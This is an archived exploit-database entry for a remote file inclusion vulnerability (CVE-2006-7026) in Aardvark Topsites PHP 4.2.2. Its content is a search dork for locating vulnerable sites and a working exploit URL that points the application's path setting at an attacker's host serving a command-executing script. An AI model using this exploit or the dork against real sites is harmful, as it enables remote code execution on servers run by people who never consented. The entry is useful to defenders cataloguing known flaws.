Aardvark Topsites PHP <= 4.2.2 - path Remote File Inclusion Vuln

2006-04-30T00:00:00
ID EDB-ID:1730
Type exploitdb
Reporter [Oo]
Modified 2006-04-30T00:00:00

Description

Aardvark Topsites PHP <= 4.2.2 (path) Remote File Inclusion Vuln. CVE-2006-7026. Webapps exploit for php platform

                                        
                                            Title: Aardvark Topsites PHP 4.2.2 remote file inclusion
URL: http://www.aardvarktopsitesphp.com/
Dork: "Powered By Aardvark Topsites PHP 4.2.2"

Exploit: /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-04-30]